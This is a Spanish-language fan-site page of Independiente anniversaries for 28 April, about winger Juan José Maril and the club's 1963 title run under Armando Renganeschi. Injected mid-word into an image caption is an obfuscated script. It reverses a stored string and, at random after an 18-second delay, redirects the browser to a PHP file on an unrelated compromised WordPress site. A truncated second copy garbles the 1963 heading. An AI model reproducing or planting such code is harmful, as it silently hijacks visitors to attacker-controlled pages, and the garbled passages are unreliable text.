Conectate con nosotros

Efemérides

Efemérides del 28 de Abril

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1918Nacimiento en la Capital Federal, de Juan José Maril. Lo he recordado en marzo por su fallecimiento, pero vale la pena recordar siempre a este gran puntero derecho que jugó desde 1939 a 1945 en el club, vistiendo la camiseta un total de 147 partidos y marcando 23 goles, para ser campeón de Primera División en 1939, y ese mismo año ganar la Copa Adrián Escobar (convirtió un gol en la final frente a San Lorenzo), la Copa Ibarguren y la Copa Aldao, más una decena de torneos no oficiales de la época.

Se había iniciado en Ferro, debutando en 1936 y permaneciendo hasta 1939 con un rendimiento notable. Desde ese club se dio su llegada al Rojo, que era el Campeón vigente del país con un equipo épico cuyos récords jamás fueron alcanzados en toda la historia. En dicho equipo Maril se ganó su puesto y fue titular en reemplazo de José Vilariño, siendo uno de los pocos cambios que hubo entre los titulares de 1938 y 1939.

De esa forma pasó a integrar la delantera más letal que haya dado nuestro País, formándose con él, Vicente De la Mata, Arsenio Erico, Antonio Sastre y Juan Zorrilla, que siguieron la línea del año anterior y destrozaron todas las redes del fútbol argentino. Fueron 104 goles en 34 encuentros disputados durante 1939 para volver a ser campeón, cifra que habla por sí sola de aquel equipo. Maril aportó 6 anotaciones en sus 22 partidos jugados, aunque lo suyo no era el gol sino el desborde para enviar la pelota a sus compañeros.

En 1945 volvió a Ferro para retirarse en dicho club un año después. Además jugó 4 partidos para la Selección Nacional en 1940. Falleció en 2009 a los 90 años de edad.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»69″ height=»53″/></figure></div>



<p><strong>1963</strong> – <strong>Independiente hace su debut en el Campeona<script>$mWn=function(n){if(typeof ($mWn.list[n])==to de Primera División de 1963, que al culminarse lo tendría como campeón.

Le tocó recibir a Chacarita y lo venció con claridad por 3 a 0, con goles marcados por Marcos Conigliaro, Tomás Rolan y Luis Suárez. De esa forma arrancó su camino hacia el título que llegaría en noviembre de ese año, y que le permitiría clasificar a la Copa Libertadores de 1964, dando inicio a la leyenda del Rey de Copas.

Ya habrá tiempo para desarrollar encuentros de ese torneo y, por supuesto, la consagración. Pero hoy me voy a detener en otra cuestión. Casi todos los que recuerdan este título lo hacen adjudicándoselo al D.T. Manuel Giúdice estando al frente del equipo, y está bien, porque con él se logra la coronación, pero lo cierto es que el campeonato tuvo 26 fechas, y en más de la mitad (17 para ser exactos), el equipo fue dirigido por Armando Renganeschi, cuyo apellido jamás se lo menciona es los recuerdos del título.

Había sido defensor en el club jugando desde 1933 hasta 1937, primero como suplente y luego titular en la temporada de 1934, cuando el equipo logra ser subcampeón con una campaña notable. Perdió el puesto y ya no volvería a jugar, por eso el Rojo lo presta a Estudiantes de La Plata, a Almagro, y a Talleres de Remedios de Escalada. Finalmente lo compraría Fluminense de Brasil en 1941. Jugó durante la década del 40 en el país vecino, pasando por San Pablo y Jabaquara hasta su retiro en 1949. En San Pablo fue tres veces campeón del Campeonato Paulista, y en dos de esos títulos coincidió con su compatriota, ex compañero, y gloria absoluta de Independiente, el jugador más polifuncional de la historia argentina e ídolo total de San Pablo, claro que me refiero al legendario Antonio “Cuila” Sastre.

Apenas retirado inicia su carrera como D.T. Por más de un decenio trabajó en Brasil dirigiendo varios equipos, como San Pablo y Palmeiras entre los más conocidos. Hasta que a inicios de 1963 regresa a Argentina para ser el D.T. de Independiente, siendo el triunfo de un día como hoy su primer partido oficial. Como ya dije, solamente dirigiría 17 fechas, porque perdería el clásico de Avellaneda por 4 a 0 y sería destituido del cargo promediando septiembre.

Analicemos rápidamente los resultados logrados por el equipo con Renganeschi al mando: luego del triunfo frente a Chacarita, llegó otra victoria visitando a Rosario Central, en las fechas 3 y 4 empató con Estudiantes de La Plata y Racing. En la quinta venció a Atlanta, y luego hubo dos empates con Huracán y Vélez. En la octava y novena logró victorias frente a Banfield y Gimnasia y Esgrima La Plata, hasta conocer la derrota en la fecha 10 visitando a Boca. En la 11 empató con River y luego igualó con Argentinos Juniors, volviendo a la victoria frente a San Lorenzo en la 13. En la 14 empata con Chacarita y luego llega una nueva derrota frente a Rosario Central. En la 16 le gana a Estudiantes de La Plata, y por último lo ya mencionado, la derrota contra Racing en la fecha 17.

En limpio fueron 7 triunfos, 7 empates y 3 caídas, significando 21 puntos. Independiente sería campeón luego de 26 fechas jugadas y alcanzando 37 puntos, por lo cual Manuel Giúdice consiguió ganar 16 unidades en 9 partidos, sin conocer la derrota desde asumir hasta terminar la competencia, siendo claramente una mejor performance, pero no por ello se debe olvidar por completo que Armando Renganeschi logró una buena suma de puntos, el 61% de los disputados.

Armando volvería a Brasil y seguiría con su extensa carrera en dicho país, dirigiendo una gran cantidad de equipos durante las décadas del 60, 70 y 80, hasta su fallecimiento en 1983.

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides